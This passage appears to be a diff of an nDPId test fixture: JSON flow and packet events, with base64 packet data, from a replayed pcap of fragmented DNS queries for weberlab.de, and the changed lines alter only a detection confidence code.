N3QVHDtfgnwRdZ0mqwEcP9Ixz7o9MUVSKZ24Kp1QfS5nvEHn5PilNALbZYZOO0cQAeV8BhlxVuALLDecEOLC8sY1mx6ozY5\/aRypyHA9HCrJT0qIHJwgtxE7ldoWyzsz32MKgZvCYMZSPOXK\/W3p61FPtD4iT4Id6xXDvyRuALL3waMUMwy3mSjXDHAdpXWaCOMfYx2IzRk4rN5TDQtUohYwaoSbystwDYKnhZGi9jS0G8FObyWhTrKCl7aTkMBaFEejCh0dfD5WJP+MDS\/TR32BG0S+GtGTl4n1Y8wgyP7nkz3\/REcevkIvpJRUImVc8A\/VPTI+9KvBSkoLPA9Za\/IpqUpgDVsKWU5bp0V0TdEryxvtwOnVXXdH0\/hJMgIgWhmZzY2\/UVoRBVGptWsAIhn5sO+UhcjvZ41p3t\/1mWp23BdUACblNtHcw2MALgABAAAAPAEfADAKAgAAADxdChURXOJ+M5BHCHdlYmVybGFiAmRlAHoYKuiyNMNSWsfXwtRR8n\/pKy73at02yEwt1EoWyfptV8sUoxs="} -00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968008021,"flow_last_seen":1558968008021,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1558968008021,"l3_proto":"ip4","src_ip":"172.217.40.76","dst_ip":"193.24.227.238","src_port":56680,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968008021,"flow_last_seen":1558968008021,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1558968008021,"l3_proto":"ip4","src_ip":"172.217.40.76","dst_ip":"193.24.227.238","src_port":56680,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} 00209{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":230,"global_ts_msec":1558968008021} 00631{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":264,"pkt_l4_len":0,"thread_ts_msec":1558968008021,"pkt":"AIac51UUAAwpil3XCABFAAD60P4AuUARLg\/BGOPurNkoTJJWaQ8FS9tIHo+oVjY51cy6+fgiJNB2zCSb2h1J8D40RJyUZYc0lguNGrMzvogBYnbxInuDKD2B8SGaumxsynJulBSZTde74knucmk+7g4DbM0zyfRD0W3RhD3u0NFdji\/0zmiI817VkCE2GpVvuL3F8KDCC+EMYjJlOHqM+STJxPq9ZF8xJcVITkC6EY6CdRmYmQdqvRYWzDXPjGtyu5XT13H1VC8IJisNUehBDr2PeppANUdXFlyqVQ6mARL6UnTBT0xam7DpmuxycO7BOql2rC7KBJb4lykg9AAAKRAAAACAAAAA"} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968010233,"flow_last_seen":1558968010233,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1558968010233,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c03::10a","dst_ip":"2001:470:765b::a25:53","src_port":46433,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1558968010233,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":120,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":120,"pkt_l4_len":66,"thread_ts_msec":1558968010233,"pkt":"AAwpil3XAIac51UUht1gArj8AEIRayoAFFBAEwwDAAAAAAAAAQogAQRwdlsAAAAAAAAKJQBTtWEANQBC7JLpxAAQAAEAAAAAAAECcGEId2ViZXJsYWICZGUAABwAAQAAKRAAAACAAAAPAAgACwACOAAgAQRwHwsW"} -00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968010233,"flow_last_seen":1558968010233,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1558968010233,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c03::10a","dst_ip":"2001:470:765b::a25:53","src_port":46433,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pa.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968010233,"flow_last_seen":1558968010233,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1558968010233,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c03::10a","dst_ip":"2001:470:765b::a25:53","src_port":46433,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pa.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 02420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1558968010234,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1510,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":1510,"pkt_l4_len":1448,"thread_ts_msec":1558968010234,"pkt":"AIac51UUAAwpil3Xht1gB4f9BbAsQCABBHB2WwAAAAAAAAolAFMqABRQQBMMAwAAAAAAAAEKEQAAAShAPAsANbVhBeUUjunEhBAAAQACAAMACQJwYQh3ZWJlcmxhYgJkZQAAHAABwAwAHAABAAAAPAAQIAEEcB8LECQAAAAAAAAAAsAMAC4AAQAAADwBHwAcCgMAAAA8XQZZ\/FzevuyQRwh3ZWJlcmxhYgJkZQC1pnXN9aJB47xcEl0t+RyJPr\/p+1OSRyBEPleyPVcVG13SY1au\/jvJTdnRA4lySA7r3bi4LlJCEattffR4fjevK4f+NrGd0s5mJ+PRg85+C1QnHQmbvL9v+MI2zPL2z8n5PSX3Yf1y4VNvPCJ7YmzWzkyABQys7VcUh58r0Vf2MDfcX+p\/oqdfN5wH3piEMrifXVk3S1jvEgqm3k\/0jIc5bfsXYFPDiziLSsKruSCkr5Ydv6DPypeAQh8lSdezjVxYVAOnbrtC88Q7QQ04+1dWXmZGW9cG+PBKFrFDsPDKsCvsJ0ggc3+bJXpyZZ0SaqfH4Zgi8NjO\/iMCsrSxLkS9wFoAAgABAAAAPAAPA25zMgh3ZWJlcmRuc8BjwFoAAgABAAAAPAAGA25zMcF3wFoALgABAAAAPAEfAAIKAgAAADxdCgDsXOJvNZBHCHdlYmVybGFiAmRlAHSoxNqqAKym4hw9iI9\/cGB9AOyri1gZ9PRCVa3kokohNFwwgJZHh\/GYLEe5aVQ16NDPaZsaEDNFKVzAqyIPhTpD66im4JiAdIma3+zQ6MM9+50XgE4zD34pXPziEN3\/hpyx0OsRaMDdi+fLJ+VSFGsK+dEf7olAlTzREwS8gAhMxbir6bK5GyMP0HpB+N56qoJQqvHlvC11N4HQ1PiAfHGM\/e0cnoTP4HtNoJs4zlO01ipMUjuZ2yl3aHqydGgSm9jswrVneievkN6cP9\/osHneUEe3pq+Na767DBQ6GotyiL0ifYjqRt+tp11FZgz+RwhCI599k5mxFSecocr80szBjgAcAAEAAA4QABAgAQRwdlsAAAAAAAAKJQBTwXMAHAABAAAOEAAQIAEEcB8LFrAAAAAACiYAU8GOAAEAAQAADhAABMEY4+7BcwABAAEAAA4QAATC9wUOwY4ALgABAAAOEACfAAEIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlALFKzqMjh9BzTzk7te1fsFGook8hWPtH0Dh2qeLmkPiC00JY45Dj2PARXv44katX35tAeXg4ix8QZs+c1GIcPatTaDXZe6J7CgZjoERP+ecNOmJ3vNLtj8s3UGq5X1b66ao4qdZN6E8DXjYpPWxeaD+6KZd7ytQjBmRNzONHV4CNwY4ALgABAAAOEACfABwIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlAEEPt\/jvpNYZTaxUf\/hq3Z6tUps6XBA9Yu325Bwy3LukMjtOntkxZ48rvFNij79Ioq3EbGxCb4PD0EVLtA5lKR6U69jYrdbsh11ahmIq4c0voBJAKVJkpfioqYTXkZCppD5DWEnFc7+3dmCZtR6n7cdLRMGXeU0ee7boqf+ntG0ywXMALgABAAAOEACfAAEIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlAAdbeEFbg2lg4i3rnV+6yQt2VeYizGmT\/rDt7rXbe9Gvg0bs7cCzKvh3nLNc7lfkw3Toxu3h2m\/NqvAJNkxLRmrtfxw68cyy4lkHhL2NLL3Y19jvp2qm25mZVgwcJylB9Dlvk0ReqgeiL8E1GyKZ+bYJb4PW+X45ewaJrdYFgGv4wXMALgABAAAOEACfABwIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlALY71RRfBids18YMqfb3pDV95vjCv9gQTwdXg7KIz9hcjsWC4LdX4rCK4Rics7xQ5QaBNODVJNd5alz0R5hMDerxbEpzVvoggNs6EwCYRezdSpP5C3DJFx6i88C2SQ=="} -00810{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968010233,"flow_last_seen":1558968010234,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1498,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1558968010234,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c03::10a","dst_ip":"2001:470:765b::a25:53","src_port":46433,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pa.weberlab.de","num_queries":1,"num_answers":14,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}} +00810{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968010233,"flow_last_seen":1558968010234,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1498,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1558968010234,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c03::10a","dst_ip":"2001:470:765b::a25:53","src_port":46433,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pa.weberlab.de","num_queries":1,"num_answers":14,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}} 00209{"error_event_id":12,"error_event_name":"nDPI IPv6\/L4 payload detection failed","datalink":1,"packet_id":6,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":89,"global_ts_msec":1558968010234} 00443{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":123,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":123,"pkt_l4_len":0,"thread_ts_msec":1558968010234,"pkt":"AIac51UUAAwpil3Xht1gB4f9AEUsQCABBHB2WwAAAAAAAAolAFMqABRQQBMMAwAAAAAAAAEKEQAFqChAPAtderZqHOphjXllMk8sHswGkSaaDoR\/AL9bqSnISQXKcnns5gAAKRAAAACAAAAPAAgACwACOAAgAQRwHwsW"} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968018074,"flow_last_seen":1558968018074,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968018074,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c06::105","dst_ip":"2001:470:765b::a25:53","src_port":63369,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1558968018074,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":121,"pkt_l4_len":67,"thread_ts_msec":1558968018074,"pkt":"AAwpil3XAIac51UUht1gCQGuAEMRayoAFFBAEwwGAAAAAAAAAQUgAQRwdlsAAAAAAAAKJQBT94kANQBDODsKMgAQAAEAAAAAAAEDZmcyCHdlYmVybGFiAmRlAAABAAEAACkQAAAAgAAADwAIAAsAAjgAIAEEcB8LFg=="} -00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968018074,"flow_last_seen":1558968018074,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968018074,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c06::105","dst_ip":"2001:470:765b::a25:53","src_port":63369,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968018074,"flow_last_seen":1558968018074,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968018074,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c06::105","dst_ip":"2001:470:765b::a25:53","src_port":63369,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1558968018075,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1510,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":1510,"pkt_l4_len":1448,"thread_ts_msec":1558968018075,"pkt":"AIac51UUAAwpil3Xht1gAmIVBbAsQCABBHB2WwAAAAAAAAolAFMqABRQQBMMBgAAAAAAAAEFEQAAASR\/DLMANfeJBdraSAoyhBAAAQACAAMACQNmZzIId2ViZXJsYWICZGUAAAEAAcAMAAEAAQAAADwABML3BArADAAuAAEAAAA8AR8AAQoDAAAAPF0J+51c4m0NkEcId2ViZXJsYWICZGUATmqKLyXYlD7oC1wjnJdPzxr55pJoGn6h+biEYxUlvjgkAKYGVr2OkUzNi9dPZZCT1\/wXWro5BadVhTNlYhGA9J99DHUUB5NEITFfyeoCqRwORKOIN8F3N4260XT5uRwPgDtpnX9J6IRQN3Hg639ASVUfreGkxN2At0j1oxD21UcoFDfwz5Fn7owm5vE3RP6EyTqHCPkRSCJvvZO+Lb6nyRwRS\/BgbrTAjIDB9gxMtXs7GIKlm\/T21iqqa\/CM0K3y9nYSv2Mbgyh+nhDaTp4WmMKZfRzP6DKGL+Myx7893ekGgWnaQNeZGzB3BTQVSEJFLULyYavsqtvSpVIspLF1IcBPAAIAAQAAADwADwNuczIId2ViZXJkbnPAWMBPAAIAAQAAADwABgNuczHBbMBPAC4AAQAAADwBHwACCgIAAAA8XQoA7FzibzWQRwh3ZWJlcmxhYgJkZQB0qMTaqgCspuIcPYiPf3BgfQDsq4tYGfT0QlWt5KJKITRcMICWR4fxmCxHuWlUNejQz2mbGhAzRSlcwKsiD4U6Q+uopuCYgHSJmt\/s0OjDPfudF4BOMw9+KVz84hDd\/4acsdDrEWjA3YvnyyflUhRrCvnRH+6JQJU80RMEvIAITMW4q+myuRsjD9B6QfjeeqqCUKrx5bwtdTeB0NT4gHxxjP3tHJ6Ez+B7TaCbOM5TtNYqTFI7mdspd2h6snRoEpvY7MK1Z3onr5DenD\/f6LB53lBHt6avjWu+uwwUOhqLcoi9In2I6kbfraddRWYM\/kcIQiOffZOZsRUnnKHK\/NLMwYMAHAABAAAOEAAQIAEEcHZbAAAAAAAACiUAU8FoABwAAQAADhAAECABBHAfCxawAAAAAAomAFPBgwABAAEAAA4QAATBGOPuwWgAAQABAAAOEAAEwvcFDsGDAC4AAQAADhAAnwABCAMAAA4QXQoqqlzij64w8Ah3ZWJlcmRucwJkZQCxSs6jI4fQc085O7XtX7BRqKJPIVj7R9A4dqni5pD4gtNCWOOQ49jwEV7+OJGrV9+bQHl4OIsfEGbPnNRiHD2rU2g12XuiewoGY6BET\/nnDTpid7zS7Y\/LN1BquV9W+umqOKnWTehPA142KT1sXmg\/uimXe8rUIwZkTczjR1eAjcGDAC4AAQAADhAAnwAcCAMAAA4QXQoqqlzij64w8Ah3ZWJlcmRucwJkZQBBD7f476TWGU2sVH\/4at2erVKbOlwQPWLt9uQcMty7pDI7Tp7ZMWePK7xTYo+\/SKKtxGxsQm+Dw9BFS7QOZSkelOvY2K3W7IddWoZiKuHNL6ASQClSZKX4qKmE15GQqaQ+Q1hJxXO\/t3ZgmbUep+3HS0TBl3lNHnu26Kn\/p7RtMsFoAC4AAQAADhAAnwABCAMAAA4QXQoqqlzij64w8Ah3ZWJlcmRucwJkZQAHW3hBW4NpYOIt651fuskLdlXmIsxpk\/6w7e6123vRr4NG7O3Asyr4d5yzXO5X5MN06Mbt4dpvzarwCTZMS0Zq7X8cOvHMsuJZB4S9jSy92NfY76dqptuZmVYMHCcpQfQ5b5NEXqoHoi\/BNRsimfm2CW+D1vl+OXsGia3WBYBr+MFoAC4AAQAADhAAnwAcCAMAAA4QXQoqqlzij64w8Ah3ZWJlcmRucwJkZQC2O9UUXwYnbNfGDKn296Q1feb4wr\/YEE8HV4OyiM\/YXI7FguC3V+KwiuEYnLO8UOUGgTTg1STXeWpc9EeYTA3q8WxKc1b6IIDbOhMAmEXs3UqT+QtwyRceovPAtklderZqHOphjXllMg=="} -00811{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968018074,"flow_last_seen":1558968018075,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1499,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1558968018075,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c06::105","dst_ip":"2001:470:765b::a25:53","src_port":63369,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":1,"num_answers":14,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"194.247.4.10"}} +00811{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968018074,"flow_last_seen":1558968018075,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1499,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1558968018075,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c06::105","dst_ip":"2001:470:765b::a25:53","src_port":63369,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":1,"num_answers":14,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"194.247.4.10"}} 00209{"error_event_id":12,"error_event_name":"nDPI IPv6\/L4 payload detection failed","datalink":1,"packet_id":9,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":78,"global_ts_msec":1558968018075} 00432{"packet_event_id":1,"packet_event_name":"packet","packet_id":9,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":112,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":112,"pkt_l4_len":0,"thread_ts_msec":1558968018075,"pkt":"AIac51UUAAwpil3Xht1gAmIVADosQCABBHB2WwAAAAAAAAolAFMqABRQQBMMBgAAAAAAAAEFEQAFqCR\/DLNPLB7MBpEmmg6EfwC\/W6kpyEkFynJ57OYAACkQAAAAgAAADwAIAAsAAjgAIAEEcB8LFg=="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968019069,"flow_last_seen":1558968019069,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968019069,"l3_proto":"ip4","src_ip":"173.194.169.104","dst_ip":"193.24.227.238","src_port":59464,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1558968019069,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1558968019069,"pkt":"AAwpil3XAIac51UUCABFAABXnz0AAGwRsyatwqlowRjj7uhIADUAQ+SwoX0AEAABAAAAAAABA2ZnMgh3ZWJlcmxhYgJkZQAAAQABAAApEAAAAIAAAA8ACAALAAI4ACABBHAfCxY="} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968019069,"flow_last_seen":1558968019069,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968019069,"l3_proto":"ip4","src_ip":"173.194.169.104","dst_ip":"193.24.227.238","src_port":59464,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968019069,"flow_last_seen":1558968019069,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968019069,"l3_proto":"ip4","src_ip":"173.194.169.104","dst_ip":"193.24.227.238","src_port":59464,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1558968019069,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1558968019069,"pkt":"AIac51UUAAwpil3XCABFAAXc4hEgAEARds3BGOPurcKpaAA16EgF2oW\/oX2EEAABAAIAAwAJA2ZnMgh3ZWJlcmxhYgJkZQAAAQABwAwAAQABAAAAPAAEwvcECsAMAC4AAQAAADwBHwABCgMAAAA8XQn7nVzibQ2QRwh3ZWJlcmxhYgJkZQBOaoovJdiUPugLXCOcl0\/PGvnmkmgafqH5uIRjFSW+OCQApgZWvY6RTM2L109lkJPX\/BdaujkFp1WFM2ViEYD0n30MdRQHk0QhMV\/J6gKpHA5Eo4g3wXc3jbrRdPm5HA+AO2mdf0nohFA3ceDrf0BJVR+t4aTE3YC3SPWjEPbVRygUN\/DPkWfujCbm8TdE\/oTJOocI+RFIIm+9k74tvqfJHBFL8GButMCMgMH2DEy1ezsYgqWb9PbWKqpr8IzQrfL2dhK\/YxuDKH6eENpOnhaYwpl9HM\/oMoYv4zLHvz3d6QaBadpA15kbMHcFNBVIQkUtQvJhq+yq29KlUiyksXUhwE8AAgABAAAAPAAPA25zMQh3ZWJlcmRuc8BYwE8AAgABAAAAPAAGA25zMsFswE8ALgABAAAAPAEfAAIKAgAAADxdCgDsXOJvNZBHCHdlYmVybGFiAmRlAHSoxNqqAKym4hw9iI9\/cGB9AOyri1gZ9PRCVa3kokohNFwwgJZHh\/GYLEe5aVQ16NDPaZsaEDNFKVzAqyIPhTpD66im4JiAdIma3+zQ6MM9+50XgE4zD34pXPziEN3\/hpyx0OsRaMDdi+fLJ+VSFGsK+dEf7olAlTzREwS8gAhMxbir6bK5GyMP0HpB+N56qoJQqvHlvC11N4HQ1PiAfHGM\/e0cnoTP4HtNoJs4zlO01ipMUjuZ2yl3aHqydGgSm9jswrVneievkN6cP9\/osHneUEe3pq+Na767DBQ6GotyiL0ifYjqRt+tp11FZgz+RwhCI599k5mxFSecocr80szBaAABAAEAAA4QAATBGOPuwYMAAQABAAAOEAAEwvcFDsFoABwAAQAADhAAECABBHB2WwAAAAAAAAolAFPBgwAcAAEAAA4QABAgAQRwHwsWsAAAAAAKJgBTwWgALgABAAAOEACfAAEIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlALFKzqMjh9BzTzk7te1fsFGook8hWPtH0Dh2qeLmkPiC00JY45Dj2PARXv44katX35tAeXg4ix8QZs+c1GIcPatTaDXZe6J7CgZjoERP+ecNOmJ3vNLtj8s3UGq5X1b66ao4qdZN6E8DXjYpPWxeaD+6KZd7ytQjBmRNzONHV4CNwWgALgABAAAOEACfABwIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlAEEPt\/jvpNYZTaxUf\/hq3Z6tUps6XBA9Yu325Bwy3LukMjtOntkxZ48rvFNij79Ioq3EbGxCb4PD0EVLtA5lKR6U